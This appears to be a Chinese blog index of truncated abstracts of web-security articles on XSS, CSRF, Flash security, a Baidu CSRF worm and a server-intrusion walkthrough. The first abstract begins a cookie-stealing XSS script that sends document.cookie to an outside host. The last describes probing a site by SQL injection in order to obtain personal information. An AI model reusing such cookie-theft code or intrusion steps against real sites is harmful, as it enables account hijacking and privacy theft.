摘要： 国内所有Mail安全漏洞(GET COOKIE)国内所有Mail安全漏洞(GET COOKIE)首先偷取Cookie，通过以下脚本引入一个js，document.write("<script src=XX.js></script>")，然后js内容为：var code;　　　　　　　　　var target = "http://www.loveshell.net/cookie.asp?";info=escape(document.location+"@@@"+document.c 阅读全文

摘要： xss的高级利用xss的高级利用目前供收录88种触发XSS的代码http://free.dis9.com/hacker/xss/Posted by adminOCT14作者:cnryan来源:http://hi.baidu.com/cnryan以往对XSS的利用大多数都是针对于挂马，钓鱼，盗cookie等，这些方式并没有真正发挥到XSS的作用，因为很少人能了解XSS的实质，会话劫持，浏览器劫持，XSS能做到的东西远远超乎我们的想象。一 XSS下提升权限随着AJAX技术在许多大型SNS网站的应用，XSS也变得愈加流行，在XSS场景下运用AJAX能更有效地发挥它的作用。用户输入的地方最容易滋生XS 阅读全文

摘要： 再论跨站脚本攻防之道再论跨站脚本攻防之道2009/10/28 16:19|鬼仔|技术文章|占个座先本文已发表于《黑客防线》作者：Xylitol译者：riusksk目录0x100 The Cross Frame Scripting｜ 0x110 理论阐述｜ 0x111漏洞代码样本｜ 0x112编写安全代码0x200 Header for fun and profit｜0x210 Cross Agent Scripting｜0x211 首份XAS漏洞代码｜0x212 安全的XAS.php代码｜0x220 Cross Referer Scripting｜0x221 XRS漏洞代码｜0x222 安全的 阅读全文

摘要： Flash应用安全规范Flash应用安全规范2009/11/02 19:01|鬼仔|技术文章|占个座先Author:jianxin [80sec]EMail:jianxin#80sec.comSite:http://www.80sec.comDate:2009-07-25From:http://www.80sec.com/release/flash-security.txt[ 目录 ]0×00前言0×01安全的服务端flash安全策略0×02安全的客户端flash安全规范0×03flash安全的checklist0 阅读全文

摘要： CSRF: 不要低估了我的危害和攻击能力CSRF: 不要低估了我的危害和攻击能力减小字体增大字体作者：佚名来源：不详发布时间：2009-10-20 7:11:51收藏到网摘：合作洽谈作者：iceskysl来源：IceskYsl@1sters!CSRF这种攻击方式虽然提出来很久（在2006年的时候就有了）了，但是这个沉睡的攻击巨人直到前不久才逐渐走入我们的视线，到底CSRF是啥，危害到底有多大？常见的利用方式是如何的，今天作为“安全相关 | Security”分类的第一篇文章，我按照自己的理解告诉你，不要低估了CSRF危害性和攻击能力。一、什么是CSRF先 阅读全文

摘要： CSRF with FlashCSRF with FlashWrite by admin in未分类at 2008-10-13 12:28:12CSRF with FlashAuthor: lake2 [80sec]EMail: lake2#80sec.comSite: http://www.80sec.comDate: 2008-10-04From: http://www.80sec.com/release/csrf-with-flash.txt——————&mda 阅读全文

摘要： CSRF攻击原理解析二CSRF攻击原理解析二Write by admin inweb应用程序安全at 2008-12-31 21:26:30CSRF攻击原理解析二Author: rayh4c [80sec]EMail: rayh4c#80sec.comSite: http://www.80sec.comDate: 2008-12-31From: http://www.80sec.com/release/csrf-securit2.txt0×00 说明提醒由于CSRF攻击原理解析老版本文档中的部分内容不是很严谨，一定程度上误导了大家，这里我表示歉意。这个文档将重新从浏览器安全 阅读全文

摘要： 百度Hi Csrf蠕虫攻击百度Hi Csrf蠕虫攻击Write by admin in未分类at 2008-09-22 11:02:20漏洞起因：百度是国内最大的中文搜索引擎。同时百度也提供了百度空间、百度贴吧等BLOG社区服务，拥有海量的用户群，号称全球最大中文社区。80sec发现过百度产品一系列的安全漏洞，其中一些问题得到了有效的修补，但是百度的产品仍然存在很多严重的安全漏洞，利用这些漏洞黑客可以制作Web蠕虫，影响百度所有的用户。CSRF worm技术分析：一. 百度用户中心短消息功能存在CSRF漏洞百度用户中心短消息功能和百度空间、百度贴吧等产品相互关联，用户可以给指定百度ID用户发送 阅读全文

摘要： CSRF-在百科的资料CSRF百科名片CSRF（Cross-site request forgery跨站请求伪造，也被称成为“one click attack”或者session riding，通常缩写为CSRF或者XSRF，是一种对网站的恶意利用。尽管听起来像跨站脚本（XSS），但它与XSS非常不同，并且攻击方式几乎相左。XSS利用站点内的信任用户，而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比，CSRF攻击往往不大流行（因此对其进行防范的资源也相当稀少）和难以防范，所以被认为比XSS更具危险性。目录示例和特性风险提示威胁 阅读全文

摘要： -从服务器渗透到获取个人信息实战从服务器渗透到获取个人信息实战作者:admin 日期:2009-05-03字体大小:小中大作者：上帝之爱很多朋友玩社工都很厉害，社工是攻击中的一种特殊应用，入侵+社工的攻击模式如果利用的好，可以所向披靡，本次的安全检测就是一次简单的尝试。话说某日我在网上胡乱搜索的时候，突然看见有一个php的连接，就忍俊不住的进去看了看，一看不要紧，事情就随之而来了，于是就有了此文！（一）安全检测1.操刀上阵当我看到了链接地址http://www.AAA.com/BBB/CCC.php?pid=XXX，就试了试在其地址后丢了个单引号，随之绝对路径就被泄露出来了，嘿嘿！（有时候可能 阅读全文